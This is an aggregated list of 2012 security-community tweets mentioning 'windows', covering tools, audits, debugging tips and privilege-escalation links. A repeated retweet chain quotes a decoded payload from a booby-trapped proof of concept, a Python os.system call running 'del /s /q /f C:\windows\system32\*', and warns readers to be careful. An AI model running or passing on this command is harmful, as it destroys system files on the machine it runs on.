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Index filtré des Tweets pour le terme windows (904 résultats)S'abonner au fil RSS Twitter pour le terme windows[2012-05-07] - 00:39:04 - "Hfuhs" - Portable Executable 101 - a windows executable walkthrough - reverse engineering experiments and documentations - http://t.co/xdTCl7C5[2012-05-06] - 08:02:10 - " dlitchfield" - @stevelord Not so good - very cloudy with a few windows. Got lucky with this one.[2012-04-28] - 12:50:05 - "DarkOperator" - @RonGula: How does Nessus perform a windows config audit for PCI 10.2.7 ? http://t.co/3YQxgZdo[2012-04-28] - 07:58:33 - " RonGula" - How does Nessus perform a windows config audit for PCI 10.2.7 ? http://t.co/U6gSPUQg[2012-04-25] - 11:06:41 - "spacerog" - @muerl windows? (only half serious) but I can definitely see APPL killing MacOS soon[2012-04-24] - 02:50:50 - "pentestit" - RT @nikhil_mitt: Kautilya 0.2.2 released...minor improvements in windows keylog and some bug fixes.. update your repositories. Pls RTht ...[2012-04-23] - 19:35:54 - "jcran" - It took FOREVER to rip @mubix's rootkit uot of windows, I'm not even sure if I got it all or just broke it. #NCCDC lol[2012-04-21] - 09:46:59 - "Carlos_Perez" - @davehull spent most of my time with work, DNSRecon, PDCE, PowerCLI and securing windows environments :)[2012-04-13] - 03:21:15 - "securityninja" - @richardebaker its a windows phone, but if the webcam on my macbook is pointing at it and showing it on it's screen that should do it?[2012-04-04] - 21:16:13 - "aszy" - windows privilege escalation via weak service permissions http://t.co/E8GDht3M[2012-04-04] - 20:28:27 - "r00tbsd" - RT @aszy: windows privilege escalation via weak service permissions http://t.co/E8GDht3M[2012-04-04] - 19:27:18 - "FlUxIuS" - RT @aszy: windows privilege escalation via weak service permissions http://t.co/E8GDht3M[2012-04-04] - 02:12:01 - "carnal0wnage" - [Shared Reader] windows privilege escalation via weak service permissions http://t.co/tnirGp1e[2012-03-24] - 09:29:33 - "ultramegaman" - @mattjay work with chromium on linux, haven't tried with chrome on windows.[2012-03-24] - 02:57:36 - " SecurityGarden" - MT @Windows: Press Alt+F4 to close your window or exit a program. #win7tips -Do this instead of clicking X or Cancel with rogue A/V windows[2012-03-20] - 04:26:26 - " espreto" - RT @jness: decoded python shellcode in FD PoC is:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 21 ...[2012-03-19] - 12:13:53 - "ChrisJohnRiley" - RT @jness: decoded python shellcode in FD PoC is:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 21 ...[2012-03-19] - 11:05:56 - "icesurfer" - RT @jness: decoded python shellcode in FD PoC is:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 21 ...[2012-03-19] - 11:01:01 - "adamshostack" - RT @jness decoded python shellcode in FD PoC is: __import__('os').system('del /s /q /f C:\windows\system32\* NUL 21') - be careful[2012-03-19] - 07:51:37 - "Wh1t3Rabbit" - RT @k8em0: RT @jness decoded python shellcode in FD PoC is:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 2 ...[2012-03-19] - 01:47:14 - " c7five" - RT @k8em0: RT @jness decoded python shellcode in FD PoC is:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 2 ...[2012-03-18] - 23:12:56 - "sambowne" - RT @k8em0: RT @jness decoded python shellcode in FD PoC is:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 2 ...[2012-03-18] - 23:12:14 - " ryanaraine" - RT @jness: decoded python shellcode in FD PoC:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 21') - be careful[2012-03-18] - 22:33:32 - " k8em0" - RT @jness decoded python shellcode in FD PoC is:__import__('os').system('del /s /q /f C:\windows\system32\* NUL 21') - be careful[2012-03-18] - 21:29:17 - " dakami" - RT @adamshostack: RT @jness decoded python shellcode in FD PoC is: __import__('os').system('del /s /q /f C:\windows\system32\* gt ...[2012-03-18] - 19:48:57 - "kingcope" - @Elwood_G in the mean time be sure that you dont have a firewall configured to block the port for example if you are on windows[2012-03-18] - 09:59:26 - "jduck1337" - RT @searchio: tip: windows kernel debugging on OSX, stick to VMware Fusion 3 and _don't_ upgrade to VMware Fusion 4, serial is broken in ...[2012-03-18] - 07:49:32 - "searchio" - tip: windows kernel debugging on OSX, stick to VMware Fusion 3 and _don't_ upgrade to VMware Fusion 4, serial is broken in version 4[2012-03-15] - 23:32:39 - "lbhuston" - @kylemaxwell Yeah, some windows folks might not even have netcat or know how.[2012-03-10] - 02:30:26 - "coolacid" - in WPAD lookups, will the browser ONLY use the windows domain, or will it also try the DHCP provided domain?[2012-03-01] - 23:24:41 - "amazonv" - @kewlphatdude1 yesterday was windows firewall[2012-02-28] - 12:32:16 - " tomaszmiklas" - ... that said - rebuilding admin console, windows client on TODO, liveCD updated, EC2 now with multitennancy and multiple projects :-D[2012-02-24] - 18:22:31 - "rgerhards" - we are working on a cee-enhanced syslog format for our windows-to-syslog tools. Looks like we get a first PoC soon![2012-02-22] - 15:58:28 - " ivanristic" - RT @ApacheLounge: [...] No Apache 2.4.1 GA for windows, see SSL issue http://t.co/30zmrKpw[2012-02-22] - 14:01:10 - " rgerhards" - staff meeting: We will be looking to support CEE/JSON syslog in our windows products. And we will look into MongoDB as a log store solution.[2012-02-10] - 07:22:49 - "xanda" - HaRET (Handhelds Reverse Engineering Tool) is an important program for reverse engineering windows mobile http://t.co/SchFS2nS[2012-02-08] - 19:01:59 - " Jolly" - has anyone tried the old firewire dma attacks on windows 7 64bit SP1? #forensics #bitlocker[2012-02-02] - 23:19:30 - " sbrabez" - @ochsff emacs debugging mode M-x gdb M-x gdb-many-windows ;)[2012-02-02] - 18:51:39 - "fbz" - @gluggergames weird degree descriptions. also compsci hiring page at @cern_jobs is rather frightening, java, oracle, windows and scada. ugh![2012-01-29] - 17:07:46 - "dave_rel1k" - @splewis69 no plans.. Although it works on nix and osx .. 3.0 will support windows ad trying to move to native python code versus 3rd party[2012-01-26] - 23:19:43 - " wycats" - @Tim_jarratt so obviously ruby doesn't work on windows?[2012-01-26] - 08:29:03 - " wycats" - @bascule the community will continue releasing NPM packages that require a C compiler, which is the main issue with ruby/windows[2012-01-25] - 07:13:33 - "xanda" - RT @gN3mes1s: windows - Mysterious, Native A Registry Key with Path: RegistryA - Stack Overflow http://t.co/voTukieO[2012-01-24] - 09:31:06 - "Wh1t3Rabbit" - @vRobM I would argue that in the age of cloud computing and zero-downtime patch windows we should see no downtime or maintenance windows[2012-01-21] - 01:53:42 - "RPetrowsky" - RT @nathanm: Engineering Windows 8 for mobile networks http://t.co/eAO2b1Ah #windows8[2012-01-20] - 17:45:37 - " gianlucaSB" - @PhysicalDrive0 @Gunther_AR I was recreating my honeypot windows image, but switching between immutable and normal hard drives is a pain[2012-01-19] - 19:03:05 - "corq" - Labyrinth Mind mapping app for windows and linux. http://t.co/DxwaANXE[2012-01-16] - 18:10:16 - "robdew" - wow the new amazon aws free usage tier includes windows server.[2012-01-15] - 19:12:55 - " searchio" - RT @InfiltrateCon: RT @Foundstone Frisbee Lite, a windows based tool to fuzz USB devices (any platform) released! http://t.co/p5Q8J1dv # ...[2012-01-14] - 02:25:58 - " Ivanlef0u" - RT @Foundstone: Frisbee Lite, a windows based tool to fuzz USB devices (any platform) released! http://t.co/J6hiF5LQ #infiltrate2012[2012-01-14] - 01:37:33 - " xanda" - RT @Foundstone: Frisbee Lite, a windows based tool to fuzz USB devices (any platform) released! http://t.co/6jjALa9e[2012-01-14] - 00:40:38 - " Marsmensch" - RT @Foundstone: Frisbee Lite, a windows based tool to fuzz USB devices (any platform) released! http://t.co/J6hiF5LQ #infiltrate2012
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